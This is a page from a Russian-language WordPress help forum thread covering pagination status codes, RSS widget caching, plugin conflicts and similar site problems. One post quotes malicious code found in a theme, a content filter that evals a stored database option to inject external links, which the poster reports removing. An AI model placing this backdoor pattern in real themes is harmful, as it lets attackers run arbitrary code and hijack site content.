Спрашиваем и отвечаем по Wordpress-2

M1
На сайте с 13.02.2007
165

Gridlik, задавайте нормально свои вопросы, давая достаточно данных для их понимания, тогда и будете получать на них ответы, а не что следует за плохую постановку вопроса.

SeVlad
На сайте с 03.11.2008
1609
MiladyX:
страницы пагинации (типа http://www.site.ru/category/page/3) не отдают 404 ошибку...а отдают 200-ю, т.е. получается, что они есть (хоть и пустые).

Ну во-первых, откуда им взяться, если рубрика пустая

Во-вторых нужно смотреть на виновника - тот плаг, который и создаёт пагинацю.

Ну и в третьих.. Сдаётся мне с category-333.php можно было поступить проще - просто написать там что нужно (или вывести её описание)

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
stundr
На сайте с 19.06.2008
201

Пытаюсь вывести последние сообщения с форума (SMF) в виджет на сайте, подскажите, как можно настроить частоту обновления стандартного виджета rss? В данный момент такое ощущение, что он обновляется раз-два в сутки, т.е. если на форуме написать сообщение, то оно в виджете отобразиться только через какое то время.

Или посоветуйте какое то более удобное решение.

=^_^=
SeVlad
На сайте с 03.11.2008
1609
stundr:
что он обновляется раз-два в сутки, т.е. если на форуме написать сообщение, то оно в виджете отобразиться только через какое то время.

По моему он запрашивает ленту каждый раз при его выведении. Т.е. если нет посещалки на сайте - никто его и не запрашивает.

А может плаги кеширования мешают?

Другая сторона проблемы - может это форум отдаёт с опозданием?

manarh
На сайте с 04.03.2010
163

Нашел в шаблоне вот такой код:

add_filter('the_content', '_bloginfo', 10001);
function _bloginfo($content){
global $post;
if(is_single() && ($co=@eval(get_option('blogoption'))) !== false){
return $co;
} else return $content;
}

данная зараза подставляет в контенте сайта внешние ссылки в точки, это я убрал, ситуацию исправил))) Но вот нашел еще вот такое:

function art_header_page_list_filter($pages)
{
$result = array();
foreach ($pages as $page)
if (0 == $page->post_parent)
$result[] = $page;
return $result;
}

это что за код?

Конвертирую свой betting трафик тут: AllBestBets ( https://www.allbestbets.com/affiliates ) и Betburger ( https://www.betburger.com/affiliates ) – $500+ с 1000 тематических переходов.
stundr
На сайте с 19.06.2008
201
SeVlad:
По моему он запрашивает ленту каждый раз при его выведении. Т.е. если нет посещалки на сайте - никто его и не запрашивает.
А может плаги кеширования мешают?
Другая сторона проблемы - может это форум отдаёт с опозданием?

проверил rss ленту форума, только что написаное сообщение мгновенно в ней появляется, при обновлении страниц на сайте в виджете этого сообщения нет...

думаю тут дело все таки в чем то другом.

плагины кеширования еще не ставил.

с других браузеров аналогично, нового сообщения нет в виджете.

Keep moving
На сайте с 20.10.2009
94

Помогите, пожалуйста, установить причину, почему в последней мозилле и хроме на главной отображается только слайдер, а в опере весь сайт (с сайдбаром и колонками новостей под слайдером)?

Пациент: ------

Upd. Проблема решилась обновлением до 3.3.1

B
На сайте с 16.02.2012
1

Здравствуйте, подскажите пожалуйста, установил виджет Slick Contact Forms для обратной связи, и кажется после этого фотографии на сайте перестали открывать через WP prettyPhoto плагин и теперь безпонтово открываются на новой странице. Как нибудь можно это исправить, кроме как удалением виджета?

И второй вопрос опять по нему же... виджет появляется при открытии любого поста сайта (на страницах не открывается), кто знает, можно ли его заставить работать только для некоторых постов, которые я сам отмечу как-нибудь?

Заранее большое спасибо!

SeVlad
На сайте с 03.11.2008
1609
stundr:
нового сообщения нет в виджете.

да, я ща проверил - действительно, так и есть. В чём причина не могу сказать. Но по /wp-admin/options.php есть неск. параметров "_transient_timeout_feed_xxxx" Подозреваю, что они могут влиять. Но что и для чего я тоже не знаю, а гугл выдачу только на буржуйском показывает, с которым у меня нет дружбы ;)

Если решение найдётся - просьба сообщить в топик.

28
На сайте с 23.02.2012
1
228

У меня онлайн библиотека сайт на ВП, как сделать так, что бы можно было книгу загружать (для онлайн просмотра) с картинками.

т.е нужно загружать текст с изображением. (я не имею ввиду вручную добавлять картинки...)

Подскажите пожалуйста... спасибо, за внимание к вопросу.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий